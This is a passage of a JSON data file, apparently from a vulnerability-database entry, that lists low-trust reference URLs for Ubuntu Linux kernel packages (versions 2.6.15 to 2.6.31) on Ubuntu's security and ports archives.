        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.24-27-generic-di_2.6.24-27.68_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.24-27-386-di_2.6.24-27.68_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.24-27-386-di_2.6.24-27.68_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.24-27-386-di_2.6.24-27.68_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.28-18-generic-di_2.6.28-18.60_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.31-20-powerpc-di_2.6.31-20.58_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.31-20-generic-di_2.6.31-20.58_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-55-powerpc-di_2.6.15-55.83_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.24-27-generic-di_2.6.24-27.68_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.31-20-powerpc-di_2.6.31-20.58_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.28-18-generic-di_2.6.28-18.60_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-55-powerpc-di_2.6.15-55.83_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-openvz_2.6.24-27.68_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.31-20-powerpc64-smp-di_2.6.31-20.58_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.31-20-powerpc-smp_2.6.31-20.58_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-generic_2.6.24-27.68_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.28-18-lpia-di_2.6.28-18.60_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.31-20-powerpc64-smp-di_2.6.31-20.58_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.27-17-generic_2.6.27-17.46_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-55-sparc64-di_2.6.15-55.83_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-55-sparc64-di_2.6.15-55.83_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.24-27-sparc64-di_2.6.24-27.68_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.31-20-generic-di_2.6.31-20.58_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.31-20-powerpc-di_2.6.31-20.58_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.28-18-generic-di_2.6.28-18.60_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-55-amd64-generic-di_2.6.15-55.83_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-55-sparc64-di_2.6.15-55.83_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.27-17-generic-di_2.6.27-17.46_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.27-17-generic-di_2.6.27-17.46_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.83_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.31-20-powerpc_2.6.31-20.58_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.24-27-generic-di_2.6.24-27.68_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/char-modules-2.6.31-20-lpia-di_2.6.31-20.58_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.24-27-generic-di_2.6.24-27.68_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.24-27-powerpc-di_2.6.24-27.68_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.31-20-sparc64-di_2.6.31-20.58_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.28-18-generic-di_2.6.28-18.60_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.31-20-generic-di_2.6.31-20.58_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.24-27-386-di_2.6.24-27.68_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.24-27-386-di_2.6.24-27.68_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.31-20-generic_2.6.31-20.58_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.31-20-sparc64-di_2.6.31-20.58_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-18-server_2.6.28-18.60_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.24-27-sparc64-di_2.6.24-27.68_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.24-27-386-di_2.6.24-27.68_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-55-powerpc-di_2.6.15-55.83_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.27-17-generic-di_2.6.27-17.46_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.28-18-generic-di_2.6.28-18.60_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55_2.6.15-55.83_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.31-20-generic_2.6.31-20.58_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-27-generic_2.6.24-27.68_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.24-27-generic-di_2.6.24-27.68_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.27-17-generic-di_2.6.27-17.46_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.24-27-generic-di_2.6.24-27.68_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/mouse-modules-2.6.31-20-lpia-di_2.6.31-20.58_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-55-amd64-generic-di_2.6.15-55.83_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.28-18-generic-di_2.6.28-18.60_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-55-amd64-generic-di_2.6.15-55.83_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.28-18.60_lpia.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.31-20-powerpc-di_2.6.31-20.58_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-55-powerpc-di_2.6.15-55.83_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.28-18-generic-di_2.6.28-18.60_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/mouse-modules-2.6.31-20-generic-di_2.6.31-20.58_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.31-20-generic-di_2.6.31-20.58_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-source-2.6.28_2.6.28-18.60_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-55-powerpc-di_2.6.15-55.83_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.28-18-generic-di_2.6.28-18.60_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-source-2.6.24_2.6.24-27.68_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-55-amd64-generic-di_2.6.15-55.83_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-amd64-k8_2.6.15-55.83_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.24-27-generic-di_2.6.24-27.68_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.24-27-generic-di_2.6.24-27.68_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.27.orig.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.27-17.46_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-55-386-di_2.6.15-55.83_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.68_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.31-20-sparc64-di_2.6.31-20.58_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-ec2_2.6.31-305.13.diff.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.24-27-386-di_2.6.24-27.68_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.27-17.46.diff.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-55-powerpc-di_2.6.15-55.83_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.24-27-generic-di_2.6.24-27.68_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.68_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.31-20-lpia-di_2.6.31-20.58_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.28-18-lpia_2.6.28-18.60_lpia.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.68_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.31-20-sparc64-di_2.6.31-20.58_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.31-20-lpia-di_2.6.31-20.58_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.83_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-source-2.6.27_2.6.27-17.46_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.28-18-generic-di_2.6.28-18.60_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ipv6-modules-2.6.27-17-generic-di_2.6.27-17.46_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-mvl-dove/linux-mvl-dove_2.6.31-212.26.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.31-20-generic-di_2.6.31-20.58_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.28-18-generic-di_2.6.28-18.60_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.31-20-generic-di_2.6.31-20.58_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.31-20-sparc64-di_2.6.31-20.58_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.24-27-sparc64-di_2.6.24-27.68_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.31-20-lpia-di_2.6.31-20.58_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.31-20-generic-di_2.6.31-20.58_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.27-17-generic-di_2.6.27-17.46_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.27-17-generic-di_2.6.27-17.46_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.27-17-generic-di_2.6.27-17.46_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.27-17-generic-di_2.6.27-17.46_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.24-27-sparc64-di_2.6.24-27.68_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.31-20-powerpc_2.6.31-20.58_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.28-18-generic-di_2.6.28-18.60_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.31-20-powerpc64-smp-di_2.6.31-20.58_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-55-amd64-generic-di_2.6.15-55.83_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.83_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.28-18-lpia-di_2.6.28-18.60_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ipv6-modules-2.6.24-27-386-di_2.6.24-27.68_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fb-modules-2.6.28-18-lpia-di_2.6.28-18.60_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.27-17-generic-di_2.6.27-17.46_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.27-17_2.6.27-17.46_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-55-sparc64-di_2.6.15-55.83_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.28-18-generic-di_2.6.28-18.60_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.24-27-386-di_2.6.24-27.68_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/socket-modules-2.6.24-27-generic-di_2.6.24-27.68_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.24-27-generic-di_2.6.24-27.68_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.27-17-generic-di_2.6.27-17.46_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.24-27-386-di_2.6.24-27.68_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.28-18-generic-di_2.6.28-18.60_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.31-20-generic-di_2.6.31-20.58_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.31-20-generic-di_2.6.31-20.58_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.31-20-sparc64-di_2.6.31-20.58_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.24-27-generic-di_2.6.24-27.68_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.68_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.24-27-sparc64-di_2.6.24-27.68_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-55-386-di_2.6.15-55.83_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.83_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.31-20-generic-di_2.6.31-20.58_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.31-20-generic-di_2.6.31-20.58_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.24-27-386-di_2.6.24-27.68_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.68_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.28-18-server_2.6.28-18.60_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-fsl-imx51/linux-fsl-imx51_2.6.31.orig.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-55-powerpc-di_2.6.15-55.83_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.31-20-sparc64-di_2.6.31-20.58_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.31-20-generic-di_2.6.31-20.58_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.27-17-generic-di_2.6.27-17.46_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.24-27-386-di_2.6.24-27.68_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/universe/l/linux/linux-image-2.6.24-27-lpiacompat_2.6.24-27.68_lpia.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.31-20-powerpc-di_2.6.31-20.58_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.27-17-generic_2.6.27-17.46_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.31-20-sparc64-di_2.6.31-20.58_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.31-20-sparc64_2.6.31-20.58_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fb-modules-2.6.31-20-lpia-di_2.6.31-20.58_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.24-27-powerpc-di_2.6.24-27.68_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.27-17-generic-di_2.6.27-17.46_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.28-18-generic-di_2.6.28-18.60_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.31-20-lpia-di_2.6.31-20.58_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.24-27-386-di_2.6.24-27.68_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.24-27-powerpc-di_2.6.24-27.68_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.31-20.58_lpia.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-55-amd64-generic-di_2.6.15-55.83_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-55-386-di_2.6.15-55.83_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.31-20-generic-di_2.6.31-20.58_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.31-20-generic-di_2.6.31-20.58_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.31-20-lpia-di_2.6.31-20.58_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-powerpc64-smp_2.6.15-55.83_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.68_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.27-17-generic-di_2.6.27-17.46_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.28-18.60_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-27-server_2.6.24-27.68_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-55-powerpc-di_2.6.15-55.83_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.31-20-powerpc64-smp_2.6.31-20.58_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.31-20-sparc64-di_2.6.31-20.58_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.24-27-386-di_2.6.24-27.68_i386.udeb"
      },
      {
        "trust": 0.1,
